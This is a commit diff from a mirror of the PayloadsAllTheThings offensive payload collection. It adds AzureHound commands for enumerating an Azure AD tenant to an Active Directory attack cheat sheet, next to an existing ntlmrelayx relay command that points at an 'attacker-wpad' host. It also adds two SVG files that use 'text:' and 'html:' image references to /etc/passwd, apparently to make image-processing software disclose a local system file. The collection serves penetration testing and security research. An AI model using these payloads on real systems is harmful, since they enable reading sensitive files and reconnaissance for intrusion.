1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-04-20 05:04:03 +02:00

AzureHound

This commit is contained in:
Swissky 2020-11-24 12:41:34 +01:00
parent 13ed9c8628
commit b918095775
3 changed files with 21 additions and 0 deletions

View File

@ -141,6 +141,17 @@
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
```
* [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
```powershell
# require: Install-Module -name Az -AllowClobber
# require: Install-Module -name AzureADPreview -AllowClobber
Connect-AzureAD
Connect-AzAccount
. .\AzureHound.ps1
Invoke-AzureHound
```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
```powershell

View File

@ -0,0 +1,5 @@
<svg width="1000" height="1000"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href="text:/etc/passwd" height="500" width="500"/>
</svg>

After

Width:  |  Height:  |  Size: 194 B

View File

@ -0,0 +1,5 @@
<svg width="1000" height="1000"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href="html:/etc/passwd" height="500" width="500"/>
</svg>

After

Width:  |  Height:  |  Size: 194 B